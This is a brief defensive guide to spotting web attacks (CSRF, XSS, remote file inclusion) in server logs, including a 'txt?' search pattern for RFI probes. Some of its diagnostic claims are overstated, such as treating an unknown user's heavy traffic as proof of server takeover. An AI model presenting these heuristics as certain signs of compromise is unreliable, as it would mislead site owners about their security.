Check Your Log Files
Every server comes with log files that you can access. Many hosting
companies even give you detailed statistics that show you where visitors
have gone and what they did.
Normally, we just use these to check the number of visitors, what browsers
they used, where they came from, when they came and which websites
were most successful. This is what makes us happy and allows us to track
our progress.
That is not really the interesting part of the statistics package or log files,
though:
- Check how many forms have been sent and who tried to send them.
This is an indicator of CSRF and XSS attacks - Check the server traffic and which files were frequently called. If the
forms are old and not frequently used, you have a CSRF attack on your
hands - Search the logs for “txt?” endings, which are an indicator of RFI attacks.
Try them out on your website; if they work, alarm bells should go off in
your head. An exception to this is robots.txt, which is a file that search
engines request before reading a folder; this is not an issue and
wouldn’t be followed by a question mark, anyway - Check the error messages and how many of them were 404 errors
(“Page not found”). Check what file names people were looking for,
which folders they attempted to access and what files they tried to read - Check which users tried to authenticate. If a user you don’t know was
causing a lot of traffic, they already have control of your server